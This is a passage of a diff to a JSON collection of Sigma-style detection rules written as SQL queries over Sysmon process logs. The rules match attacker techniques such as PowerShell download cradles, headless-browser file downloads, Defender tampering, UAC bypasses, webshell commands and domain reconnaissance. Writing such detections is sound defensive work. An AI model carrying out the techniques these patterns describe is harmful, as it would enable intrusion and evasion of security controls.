CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "status": "test", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "XSL Script Processing", - "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", + "title": "Potential Arbitrary File Download Via MSEdge.EXE", + "id": "94771a71-ba41-4b6e-a757-b531372eaab6", "status": "test", - "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects usage of the \"msedge.exe\" binary as a LOLBIN to download arbitrary file via the CLI", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", - "Msxsl.exe is not installed by default, so unlikely.", - "Static format arguments - https://petri.com/command-line-wmi-part-3" + "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%/format%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/Format:List%' ESCAPE '\\' OR CommandLine LIKE '%/Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%/Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%/Format:table%' ESCAPE '\\' OR CommandLine LIKE '%/Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%/Format:value%' ESCAPE '\\' OR CommandLine LIKE '%/Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:csv%' ESCAPE '\\'))) OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR OriginalFileName = 'msedge.exe') AND (CommandLine LIKE '%.exe http%' ESCAPE '\\' OR CommandLine LIKE '%msedge http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_xsl_script_processing.yml" + "filename": "proc_creation_win_browsers_msedge_arbitrary_download.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", - "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "author": "frack113", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "status": "experimental", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Sometimes used by developers or system administrators for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_pua_process_hacker.yml" }, { - "title": "Wlrmdr Lolbin Use as Launcher", - "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", + "title": "Suspicious Electron Application Child Processes", + "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", "status": "experimental", - "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", - "author": "frack113, manasmbellani", + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((Image LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentImage = '-')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\discord.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wlrmdr.yml" + "filename": "proc_creation_win_susp_electron_app_children.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", - "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "status": "experimental", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", - "id": "536e2947-3729-478c-9903-745aaffe60d2", + "title": "Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Legitimate processes that run at logon. Filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_invocation_specific.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "HackTool - Jlaive In-Memory Assembly Execution", - "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "status": "experimental", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Legitimate administration use but user and host must be investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects a set of suspicious network related commands often used in recon stages", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Dumping Process via Sqldumper.exe", - "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", - "status": "test", - "description": "Detects process dump via legitimate sqldumper.exe binary", - "author": "Kirill Kiryanov, oscd.community", + "title": "Suspicious Cabinet File Execution Via Msdt.EXE", + "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", + "status": "experimental", + "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates 